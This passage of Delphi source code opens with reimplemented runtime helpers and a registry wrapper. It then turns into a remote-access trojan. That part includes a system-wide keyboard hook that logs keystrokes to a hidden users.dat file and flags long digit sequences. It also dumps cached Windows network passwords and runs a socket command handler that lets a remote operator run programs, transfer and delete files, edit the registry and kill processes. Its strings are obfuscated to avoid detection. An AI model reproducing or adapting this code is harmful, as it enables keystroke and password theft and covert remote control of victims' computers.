begin
  Result := mbSingleByte;
  if (Index = 0) then
  begin
    if P[Index] in LeadBytes then Result := mbLeadByte;
  end
  else
  begin
    if (P[Index-1] in LeadBytes) and (ByteTypeTest(P, Index-1) = mbLeadByte) then
      Result := mbTrailByte
    else if P[Index] in LeadBytes then
      Result := mbLeadByte;
  end;
end;

function ByteType(const S: string; Index:
Integer): TMbcsByteType; begin Result := mbSingleByte; if SysLocale.FarEast then Result := ByteTypeTest(PChar(S), Index-1); end; function LastDelimiter(const Delimiters, S: string): Integer; var P: PChar; begin Result := Length(S); P := PChar(Delimiters); while Result > 0 do begin if (S[Result] <> #0) and (StrScan(P, S[Result]) <> nil) then if (ByteType(S, Result) = mbTrailByte) then Dec(Result) else Exit; Dec(Result); end; end; function ExtractFilePath(const FileName: string): string; var I: Integer; begin I := LastDelimiter('\:', FileName); Result := Copy(FileName, 1, I); end; procedure FindClose(var F: TSearchRec); begin if F.FindHandle <> INVALID_HANDLE_VALUE then Windows.FindClose(F.FindHandle); end; function FindMatchingFile(var F: TSearchRec): Integer; var LocalFileTime: TFileTime; begin with F do begin while FindData.dwFileAttributes and ExcludeAttr <> 0 do if not FindNextFile(FindHandle, FindData) then begin Result := GetLastError; Exit; end; FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi, LongRec(Time).Lo); Size := FindData.nFileSizeLow; Attr := FindData.dwFileAttributes; Name := FindData.cFileName; end; Result := 0; end; function FindFirst(const Path: string; Attr: Integer; var F: TSearchRec): Integer; const faSpecial = faHidden or faSysFile or faVolumeID or faDirectory; begin F.ExcludeAttr := not Attr and faSpecial; F.FindHandle := FindFirstFile(PChar(Path), F.FindData); if F.FindHandle <> INVALID_HANDLE_VALUE then begin Result := FindMatchingFile(F); if Result <> 0 then FindClose(F); end else Result := GetLastError; end; function FindNext(var F: TSearchRec): Integer; begin if FindNextFile(F.FindHandle, F.FindData) then Result := FindMatchingFile(F) else Result := GetLastError; end; //=== Registry call ================ constructor TRegistry.Create; begin RootKey := HKEY_CURRENT_USER; LazyWrite := True; end; function DataTypeToRegData(Value: Integer): TRegDataType; begin if Value = 
REG_SZ then Result := rdString else if Value = REG_EXPAND_SZ then Result := rdExpandString else if Value = REG_DWORD then Result := rdInteger else if Value = REG_BINARY then Result := rdBinary else Result := rdUnknown; end; function RegDataToDataType(Value: TRegDataType): Integer; begin case Value of rdString: Result := REG_SZ; rdExpandString: Result := REG_EXPAND_SZ; rdInteger: Result := REG_DWORD; rdBinary: Result := REG_BINARY; else Result := REG_NONE; end; end; function TRegistry.GetDataInfo(const ValueName: string; var Value: TRegDataInfo):boolean; var DataType: Integer; begin FillChar(Value, SizeOf(TRegDataInfo), 0); Result := RegQueryValueEx(CurrentKey, PChar(ValueName), nil, @DataType, nil, @Value.DataSize) = ERROR_SUCCESS; Value.RegData := DataTypeToRegData(DataType); end; function TRegistry.GetData(const Name: string; Buffer: Pointer; BufSize: Integer; var RegData: TRegDataType): Integer; var DataType: Integer; begin DataType := REG_NONE; if RegQueryValueEx(CurrentKey, PChar(Name), nil, @DataType, PByte(Buffer), @BufSize) <> ERROR_SUCCESS then // raise ERegistryException.CreateFmt(SRegGetDataFailed, [Name]); Result := BufSize; RegData := DataTypeToRegData(DataType); end; procedure TRegistry.PutData(const Name: string; Buffer: Pointer; BufSize: Integer; RegData: TRegDataType); var DataType: Integer; begin DataType := RegDataToDataType(RegData); if RegSetValueEx(CurrentKey, PChar(Name), 0, DataType, Buffer, BufSize) <> ERROR_SUCCESS then // raise ERegistryException.CreateFmt(SRegSetDataFailed, [Name]); end; function TRegistry.GetDataSize(const ValueName: string): Integer; var Info: TRegDataInfo; begin if GetDataInfo(ValueName, Info) then Result := Info.DataSize else Result := -1; end; procedure TRegistry.WriteString(const Name, Value: string); begin PutData(Name, PChar(Value), Length(Value), rdString); end; procedure ReadError(const Name: string); begin // raise ERegistryException.CreateFmt(SInvalidRegType, [Name]); end; function TRegistry.ReadString(const 
Name: string): string; var Len: Integer; RegData: TRegDataType; begin Len := GetDataSize(Name); if Len > 0 then begin SetString(Result, nil, Len); GetData(Name, PChar(Result), Len, RegData); if (RegData = rdString) or (RegData = rdExpandString) then SetLength(Result, StrLen(PChar(Result))) else ReadError(Name); end else Result := ''; end; procedure TRegistry.CloseKey; begin if CurrentKey <> 0 then begin if LazyWrite then RegCloseKey(CurrentKey) else RegFlushKey(CurrentKey); FCurrentKey := 0; FCurrentPath := ''; end; end; procedure TRegistry.ChangeKey(Value: HKey; const Path: string); begin CloseKey; FCurrentKey := Value; FCurrentPath := Path; end; procedure TRegistry.SetRootKey(Value: HKEY); begin if RootKey <> Value then begin if FCloseRootKey then begin RegCloseKey(RootKey); FCloseRootKey := False; end; FRootKey := Value; CloseKey; end; end; function TRegistry.GetBaseKey(Relative: Boolean): HKey; begin if (CurrentKey = 0) or not Relative then Result := RootKey else Result := CurrentKey; end; function IsRelative(const Value: string): Boolean; begin Result := not ((Value <> '') and (Value[1] = '\')); end; function TRegistry.OpenKey(const Key: string; CanCreate: Boolean): Boolean; var TempKey: HKey; S: string; Disposition: Integer; Relative: Boolean; begin S := Key; Relative := IsRelative(S); if not Relative then Delete(S, 1, 1); TempKey := 0; if not CanCreate or (S = '') then begin Result := RegOpenKeyEx(GetBaseKey(Relative), PChar(S), 0, KEY_ALL_ACCESS, TempKey) = ERROR_SUCCESS; end else Result := RegCreateKeyEx(GetBaseKey(Relative), PChar(S), 0, nil, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nil, TempKey, @Disposition) = ERROR_SUCCESS; if Result then begin if (CurrentKey <> 0) and Relative then S := CurrentPath + '\' + S; ChangeKey(TempKey, S); end; end; destructor TRegistry.Destroy; begin CloseKey; inherited; end; //== Allocate windows === const InstanceCount = 313; Type TWndMethod = procedure(var Message: TMessage) of object; type PObjectInstance = 
^TObjectInstance; TObjectInstance = packed record Code: Byte; Offset: Integer; case Integer of 0: (Next: PObjectInstance); 1: (Method: TWndMethod); end; type PInstanceBlock = ^TInstanceBlock; TInstanceBlock = packed record Next: PInstanceBlock; Code: array[1..2] of Byte; WndProcPtr: Pointer; Instances: array[0..InstanceCount] of TObjectInstance; end; var InstBlockList: PInstanceBlock; InstFreeList: PObjectInstance; function StdWndProc(Window: HWND; Message, WParam: Longint; LParam: Longint): Longint; stdcall; assembler; asm XOR EAX,EAX PUSH EAX PUSH LParam PUSH WParam PUSH Message MOV EDX,ESP MOV EAX,[ECX].Longint[4] CALL [ECX].Pointer ADD ESP,12 POP EAX end; function CalcJmpOffset(Src, Dest: Pointer): Longint; begin Result := Longint(Dest) - (Longint(Src) + 5); end; function MakeObjectInstance(Method: TWndMethod): Pointer; const BlockCode: array[1..2] of Byte = ( $59, { POP ECX } $E9); { JMP StdWndProc } PageSize = 4096; var Block: PInstanceBlock; Instance: PObjectInstance; begin if InstFreeList = nil then begin Block := VirtualAlloc(nil, PageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Block^.Next := InstBlockList; Move(BlockCode, Block^.Code, SizeOf(BlockCode)); Block^.WndProcPtr := Pointer(CalcJmpOffset(@Block^.Code[2], @StdWndProc)); Instance := @Block^.Instances; repeat Instance^.Code := $E8; { CALL NEAR PTR Offset } Instance^.Offset := CalcJmpOffset(Instance, @Block^.Code); Instance^.Next := InstFreeList; InstFreeList := Instance; Inc(Longint(Instance), SizeOf(TObjectInstance)); until Longint(Instance) - Longint(Block) >= SizeOf(TInstanceBlock); InstBlockList := Block; end; Result := InstFreeList; Instance := InstFreeList; InstFreeList := Instance^.Next; Instance^.Method := Method; end; { Free an object instance } procedure FreeObjectInstance(ObjectInstance: Pointer); begin if ObjectInstance <> nil then begin PObjectInstance(ObjectInstance)^.Next := InstFreeList; InstFreeList := ObjectInstance; end; end; var UtilWindowClass: TWndClass = ( style: 0; 
lpfnWndProc: @DefWindowProc; cbClsExtra: 0; cbWndExtra: 0; hInstance: 0; hIcon: 0; hCursor: 0; hbrBackground: 0; lpszMenuName: nil; lpszClassName: 'TPUtilWindow'); function AllocateHWnd(Method: TWndMethod): HWND; var TempClass: TWndClass; ClassRegistered: Boolean; begin UtilWindowClass.hInstance := HInstance; ClassRegistered := GetClassInfo(HInstance, UtilWindowClass.lpszClassName, TempClass); if not ClassRegistered or (TempClass.lpfnWndProc <> @DefWindowProc) then begin if ClassRegistered then Windows.UnregisterClass(UtilWindowClass.lpszClassName, HInstance); Windows.RegisterClass(UtilWindowClass); end; Result := CreateWindowEx(WS_EX_TOOLWINDOW, UtilWindowClass.lpszClassName, '', WS_POPUP {!0}, 0, 0, 0, 0, 0, 0, HInstance, nil); if Assigned(Method) then SetWindowLong(Result, GWL_WNDPROC, Longint(MakeObjectInstance(Method))); end; procedure DeallocateHWnd(Wnd: HWND); var Instance: Pointer; begin Instance := Pointer(GetWindowLong(Wnd, GWL_WNDPROC)); DestroyWindow(Wnd); if Instance <> @DefWindowProc then FreeObjectInstance(Instance); end; //==== Key_log========================= type PGlobalDLLData = ^TGlobalDLLData; TGlobalDLLData = record hHookHWnd: HWND; hKeyHook: HHOOK; end; const MMFileName = 'Users'; var MapHandle: THandle; GlobalData: PGlobalDLLData; tt,Logger:string; l:textfile; cc:byte; procedure OpenSharedData; var Size: integer; CreateFileMappingError: integer; begin Size := SizeOf( TGlobalDLLData ); MapHandle := CreateFileMapping( $FFFFFFFF, nil, PAGE_READWRITE, 0, Size, MMFileName ); CreateFileMappingError := GetLastError; if ( MapHandle = 0 ) then exit; GlobalData := MapViewOfFile( MapHandle, FILE_MAP_ALL_ACCESS, 0, 0, Size ); if ( GlobalData = nil ) then begin CloseHandle( MapHandle ); exit; end; if ( ( MapHandle <> 0 ) and ( CreateFileMappingError <> ERROR_ALREADY_EXISTS ) ) then begin GlobalData^.hHookHWnd := 0; GlobalData^.hKeyHook := 0; end; end; procedure CloseSharedData; begin UnmapViewOfFile( GlobalData ); CloseHandle( MapHandle ); end; 
//function KeyCounter( code: integer; wParam: integer; lParam: integer ): lRESULT stdcall; function KeyCounter( code: integer; wParam: integer; lParam: integer ): LRESULT; stdcall; begin OpenSharedData; Result := CallNextHookEx( GlobalData^.hKeyHook, Code, wParam, lParam ); if ( code = HC_ACTION ) then begin if ( lParam > 0 ) then begin PostMessage( GlobalData^.hHookHWnd, UM_KEYHIT, wParam, 0 ); end; Result := 0; exit; end; end; procedure KeyHook_Start( hWin: HWND ); //stdcall; begin OpenSharedData; GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, KeyCounter, hInstance, 0 ); GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, nil, hInstance, 0 ); GlobalData^.hHookHWnd := hWin; end; procedure KeyHook_Stop; //stdcall; begin OpenSharedData; UnHookWindowsHookEx( GlobalData^.hKeyHook ); CloseSharedData; end; procedure TLog.KeyIncrement( var Msg: TMessage ); const lettres: array[65..90] of Char = 'abcdefghijklmnopqrstuvwxyz'; chiffres: array[96..111] of Char = '0123456789*+ - /'; chiffres2: array[48..57] of Char = '0123456789'; var k:integer; s:string; begin k:=msg.WParam; //writeln(inttostr(k)+' : '+char(k)); if k in [96..111] then s:=chiffres[k] else if k in [65..90] then s:=lettres[k] else if k in [48..57] then s:=chiffres2[k] else if k in [112..123] then s:=#255 else if k in [33..40] then s:=#255 else if k = 0 then s:=#255 else if k > 255 then s:=#255 else if k = 16 then s:=crypt('=QKMCR9') else //<SHIFT> if k = 17 then s:=crypt('=AWVI8') else //<CTRL> if k = 18 then s:=crypt('=COP;') else //<ALT> if k = 20 then s:=crypt('=ABTV8') else //<CAPS> if k = 144 then s:=crypt('=LVI;') else //<NUM> if k = 9 then s:=crypt('=vbf;') else //<tab> if k = 8 then s:=crypt('=<') else //<> if k = 223 then s:='!' else if k = 219 then s:=')' else if k = 187 then s:='=' else if k = 221 then s:='^' else if k = 186 then s:='$' else if k = 192 then s:='? 
else if k = 220 then s:='*' else if k = 188 then s:=',' else if k = 190 then s:=';' else if k = 191 then s:=':' else if k = 226 then s:='<' else if k = 222 then s:='?' else if k = 13 then s:='?' else if k = 32 then s:=' ' else if k = 46 then s:=crypt('=ffh;') else //<del> if k = 45 then s:=crypt('=kmw;') else //<ins> s:='['+inttostr(k)+']'; logger:=logger+s; write(s); if (s[1] in ['0'..'9']) or (s[1]=' ') or (s[1]='-') then inc(cc) else cc:=0; if (cc=13) then begin cc:=0; Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); Registre.WriteString('1','1'); Registre.Free; end; if length(logger)>200 then begin if not fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat rewrite(l); write(l,' '); closefile(l); end; assignfile(l,systemdir+crypt(']wpawu)lh~'));//\users.dat reset(l); append(l); write(l,logger); closefile(l); logger:=''; end; end; procedure TLog.LogCreate; var tyhwnd:thandle; begin cc:=0; tyhwnd := AllocateHwnd(KLog.KeyIncrement); KeyHook_Start(tyhwnd); end; procedure TLog.LogDestroy; begin KeyHook_Stop; {$I-} assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(l); append(l); write(l,logger); closefile(l); logger:=''; {$I+} end; //=== password connection function EnumPasswordCallbackProc(pce: TPPasswordCacheEntry; pdw: cardinal) : LongBool; stdcall; var s1 : string; s2 : string; begin result:=true; SetLength(s1,pce^.cbResource); Move(pce^.abResource[0],pointer(s1)^,pce^.cbResource); s1:=pchar(s1); SetLength(s2,pce^.cbPassword); Move(pce^.abResource[pce^.cbResource],pointer(s2)^,pce^.cbPassword); s2:=pchar(s2); write(t,PChar(s1+' : '+s2+#13+#10)); end; procedure testEnumCachedPasswords; var WNetEnumCachedPasswords : function (ps: pchar; pw: word; pb: byte; proc: pointer; bdw: cardinal) : word; stdcall; mpr : cardinal; begin mpr:=LoadLibrary('mpr'); if mpr<>0 then try 
WNetEnumCachedPasswords:=GetProcAddress(mpr,pchar(crypt('VLfp@hreJkhdhj_qbad{grd'))); //WNetEnumCachedPasswords if @WNetEnumCachedPasswords<>nil then begin try WNetEnumCachedPasswords(nil,0,$FF,@EnumPasswordCallbackProc,0); finally end; end; finally FreeLibrary(mpr) end; end; //===windows_control procedure killprocess(prname:string); var str : pchar; h:hwnd; begin str:=@(prname)[1]; h := FindWindow(nil,str); if h <> 0 then PostMessage(h, WM_QUIT, 0, 0); end; {function childproc(h:HWND):bool;stdcall; var tempstring: array [0..255] of char; begin GetClassName(h,classe,255); if (classe=nil) or (classe=string(' ')) then exit; if classe='Edit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; if classe='TEdit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; end; function AddTopLevelWindowsToList2(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin counter:=0; if pos('Netscape',klasse)<>0 then counter:=1; //+ ' (' + inttostr(h) if pos('Explorer',klasse)<>0 then counter:=1; //writeln(string(klasse)); if pos('Opera',klasse)<>0 then counter:=1; end; end; if counter=1 then EnumChildWindows(h,@childproc,8); end; } function AddTopLevelWindowsToList(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin write(t,string(klasse)+#13+#10); end; end; end; //=== information === procedure DoPassword(wParam:longInt); var pp:string; sock:tsock; begin assignfile(t,windowsdir+'~tmp..sys'); rewrite(t); append(t); testEnumCachedPasswords; closefile(t); assignfile(t,windowsdir+'~tmp..sys'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, 
PChar(pp+#13+#10)); sleep(Timeout); until pp=''; closefile(t); erase(t); end; procedure DoAbout(wParam:longInt); var SI:TSystemInfo; OsVer:TOSVersionInfoA; MS:TMemoryStatus; pp:string; begin ZeroMemory(@OsVer,SizeOf(OsVer)); ZeroMemory(@Si,SizeOf(Si)); ZeroMemory(@MS,SizeOf(MS)); MS.dwLength:=SizeOf(MS); OsVer.dwOSVersionInfoSize:=SizeOf(OsVer); GetVersionEx(OsVer); GetSystemInfo(Si); GlobalMemoryStatus(MS); case Win32Platform of WINDOWS.VER_PLATFORM_WIN32_WINDOWS : pp:='95'; WINDOWS.VER_PLATFORM_WIN32s : pp:='32'; WINDOWS.VER_PLATFORM_WIN32_NT : pp:='NT'; end; Sock.WriteString(wParam, PChar( crypt('R{pp`k=')+#13+#10+ //System: WSD.szDescription+#13+#10+ crypt('NQ9$')+IntToStr(OsVer.dwMajorVersion)+'.'+IntToStr(OsVer.dwMinorVersion)+#13+#10+ //OS: crypt('own$FVR2)')+IntToStr(Si.dwNumberOfProcessors)+#13+#10+ //num CPU: crypt('BRV$')+IntToStr(Si.dwProcessorType)+#13+#10+ //CPU crypt('SCN$')+IntToStr(Round(MS.dwTotalPhys/1048576))+#13+#10+ //RAM crypt('GpfaWGJ(')+IntToStr(Round(MS.dwAvailPhys/1024))+#13+#10+ //FreeRAM crypt('Wpw$')+IntToStr(Round(MS.dwTotalVirtual/1048576))+#13+#10+ //Vrt crypt('GpfaSts(')+IntToStr(Round(MS.dwAvailVirtual/1048576))+#13+#10+ //FreeVrt crypt('R{pp`k=(')+systemdir+'\'+#13+#10+ //System: crypt('Vkm`jq=(')+windowsdir+'\'+#13+#10+ //Window: WSD.szSystemStatus+' '+pp+#13+#10+ crypt('Impp?&')+getlocalhostname+#13+#10)); //Host: end; procedure DoShowDirectory(wParam:longInt;command:String); var sss,NomDuDossier,DossierTrouve,FichierTrouve:string; attributs,Resultat:Integer; SearchRec:TSearchRec; TailleDuFichier:integer; begin attributs:=6; sock.writestring(wParam,pchar(crypt('EkqWfgi2')+#13+#10)); //DirScan: sleep(timeout); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+'*.*',FaDirectory,SearchRec); while Resultat=0 do begin if (SearchRec.Name<>'.') and (SearchRec.Name<>'..') and ((SearchRec.Attr and faDirectory)>0) then begin DossierTrouve:=command+'\'+SearchRec.Name; 
NomDuDossier:=DossierTrouve; // ProcessMessages; end; if NomDuDossier<>sss then begin sleep(timeout); if NomDuDossier<>'' then NomduDossier:=NomDuDossier+'\'; sock.writestring(wParam,pchar(crypt('}F9')+NomduDossier+#13+#10)); //|D: end; sss:=NomDuDossier; Resultat:=FindNext(SearchRec); end; FindClose(SearchRec); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+crypt('+,)'),Attributs,SearchRec); //*.* while Resultat=0 do begin //ProcessMessages; if ((SearchRec.Attr and faDirectory)<=0) then begin FichierTrouve:=command+'\'+SearchRec.Name; TailleDuFichier:=SearchRec.Size; //NomFichierComplet:=FichierTrouve; //DateHeureDuFichier:=SearchRec.Time; end; sleep(timeout); Resultat:=FindNext(SearchRec); sock.writestring(wParam,pchar(crypt('}D9')+FichierTrouve+'|'+inttostr(tailledufichier)+#13+#10)); //|F: end; FindClose(SearchRec); sleep(timeout); sock.writestring(wParam,pchar(crypt('}D9$YZo|dfWP')+#13+#10)); //|F: \\html\\ end; procedure DoStart(wParam:longInt); var ch:char; VolNameStr,Tip:String; LW:byte; Dsize,NamLen,syslen:integer; VolNameAry: array[0..255] of char; VolSer,SysFlags : DWord; begin Driv:=''; d:=0; ch:=#97; sock.WriteString(wParam, PChar(crypt('EmPpdts2')+#13+#10)); //DoStart: repeat d:=d+1; s:=ch+':\'; case getDriveType(pChar(s)) of DRIVE_FIXED: begin Tip:='0'; //Fixed HD NamLen:=255; SysLen:=255; if GetVolumeInformation(pChar(s), VolNameAry, NamLen, @VolSer, SysLen, SysFlags, nil, 0) then VolNameStr := StrPas(VolNameAry) else VolNameStr := ''; LW := ord(upcase(s[1])) - 64; DSize := DiskSize(LW); if (DSize <> -1) then DSize := disksize(LW) DIV 1024; //Driv:=Driv+'Drive: '+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; Driv:=crypt('}F9')+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; //|D: end; DRIVE_CDROM: begin Tip:='1'; //CD-ROM Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_RAMDISK: begin Tip:='2'; //RAM Disk 
Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_REMOVABLE: begin Tip:='3'; //Removable Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+tip+'|0|'+#13+#10; end; DRIVE_REMOTE: begin Tip:='4'; //Network Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+tip+'|0|'+#13+#10; end; 0 : s:=''; //do nothing; 1 : s:=''; //do nothing; end; sleep(timeout); sock.WriteString(wParam, PChar(Driv)); driv:=''; inc(ch); until d=26; sleep(timeout); sock.WriteString(wParam, PChar(crypt(']^kphj[T')+#13+#10)); //\\html\\ end; procedure DoShowLog(wParam:longInt); var f:file of byte; p:longint; begin Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); if fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(f,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(f); p:=filesize(f); sock.writestring(wParam,pchar(crypt('mmd>%')+Registre.ReadString('1')+' '+s+' '+inttostr(p)+#13+#10)); //log: closefile(f); end; Registre.Free; end; procedure DoExecFile(wParam:longInt;Command:String); var R:Integer; Params:String; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; R:=ShellExecute(0,nil,PChar(Command),PChar(Params),nil,SW_NORMAL); if R<=32 then sock.WriteString(wParam, PChar(ERROR+#13+#10)) else sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoProxy(wParam:longInt;Command:String); begin // end; procedure DoDeleteFile(wParam:longInt;Command:String); var St:String; Found:Integer; F:TSearchRec; begin Found:=FindFirst(Command,faAnyFile, F); St:=''; while Found = 0 do begin if DeleteFile(ExtractFilePath(Command)+F.Name) then St:=St+F.Name; Found:=FindNext(F); end; sock.WriteString(wParam, PChar(crypt('Dpbw`b''n`fn7')+St+#13+#10)); //Erased files: end; procedure DoSendFile(wParam:longInt;Command:String); var {f:file of byte;} f:HFile; st:string; NumRead:Integer; p:array[1..1024] of char; OfStr:TOFStruct; FF:TSearchRec; begin 
f:=OpenFile(PChar(Command),OFStr,OF_READ); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; FindFirst(Command,faAnyFile, FF); St:=IntToStr(FF.Size); sock.WriteString(wParam, PChar(crypt('mmb`cok2')+st+'|'+#13+#10)); //loadfil: sleep(timeout); repeat ReadFile(f,P,SizeOf(P),NumRead,nil); Sleep(timeout); if sock.WriteData(wParam,@P,numread)=0 then begin _lclose(f); exit; end; until (NumRead = 0); _lclose(f); end; procedure DoReceiveFile(wParam:longInt;Command:String); begin //done; end; procedure DoRenameFile(wParam:longInt;Command:String); var Params:String; f:file; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; assignfile(f,command); if params<>'' then Rename(f,params) else exit; sock.writeString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoCreateDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; MkDir(command); sock.WriteString(wParam, PChar(crypt('Bpfeqc''l`x1')+St+#13+#10)); //Create dir: end; procedure DoDeleteDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; RmDir(command); sock.WriteString(wParam, PChar(crypt('Dpbw`&ca{0')+St+#13+#10)); //Erase dir: end; procedure DoWriteReg(wParam:longInt;Command:String); var Params,Params1,Params2,Params3:String; begin params:=''; params1:=''; params2:=''; params3:=''; if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params2:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params3:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 
then Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); Registre.WriteString(params2,pchar(params3)); Registre.Free; sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoReadReg(wParam:longInt;Command:String); var params,params1,params2:string; begin if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params2:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 then Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); sock.WriteString(wParam, PChar('Data: '+Registre.ReadString(params2)+#13+#10)); Registre.Free; end; procedure DoKillProcess(wParam:longInt;Command:String); begin Killprocess(command); sock.WriteString(wParam, PChar(crypt('Jkohlh`2)')+command+#13+#10)); //Killing: end; procedure DoWindowsProcess(wParam:longInt); var pp:string; begin assignfile(t,windowsdir+'~tmp..dat'); rewrite(t); append(t); EnumWindows(@AddTopLevelWindowsToList,8); closefile(t); 
assignfile(t,windowsdir+'~tmp..dat'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, PChar(pp+#13+#10)); sleep(timeout); until pp=''; closefile(t); erase(t); end; procedure DoTimeout(wParam:longInt;Command:String); begin timeout:=strtoint(command); sock.WriteString(wParam, PChar('Timeout: '+command+#13+#10)); end; procedure TSock.OnServerRead(wParam,lParam:longInt); var Command:String; f:HFile; check:string; NumWrite:Integer; OfStr:TOFStruct; t1,t2,yy,taille:longint; Buffy:array[1..1024] of char; begin CountRB:=recv(wParam,Buffy,SizeOf(Buffy),0); if CountRB = 0 then exit; Command:=Copy(Buffy,Pos('/',Buffy)+1,Pos('HTTP',Buffy)-Pos('/',Buffy)-2); if command='' then exit; case command[1] of '0' : DoAbout(wParam); '1' : DoShowDirectory(wParam,copy(command,pos('?',command)+1,255)); '2' : DoStart(wParam); '3' : DoShowLog(wParam); '4' : DoExecFile(wParam,copy(command,pos('?',command)+1,255)); '5' : DoSendFile(wParam,copy(command,pos('?',command)+1,255)); '6' : DoDeleteFile(wParam,copy(command,pos('?',command)+1,255)); '7' : begin command:=copy(command,pos('?',command)+1,255); check:=copy(command,pos('|',command)+1,pos('&',command)-1); taille:=strtoint(check); delete(command,pos('|',command),length(command)); sock.WriteString(wParam, PChar('sendfil:'+#13+#10)); f:=OpenFile(PChar(Command),OFStr,OF_CREATE); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; yy:=0; t1:=round((taille+512)/1024); t2:=t1*1024; //nombre packet t1:=t2-taille; //end packet //t1:=taille-t2; repeat CountRB:=recv(wParam,Buffy,sizeof(Buffy),0); if countRB<>65535 then begin //writeln(taille); if taille<=1024 then begin WriteFile(f,Buffy,taille,NumWrite,nil); _lclose(f); exit; end; yy:=yy+countRB; //bug if yy=t2 then begin t1:=1024-abs(t1); //writeln(t1); WriteFile(f,Buffy,t1,NumWrite,nil); _lclose(f); exit; end else WriteFile(f,Buffy,countRB,NumWrite,nil); end; fillchar(buffy,sizeof(buffy),#0); until (yy>=taille) or (NumWrite = 0); _lclose(f); exit; 
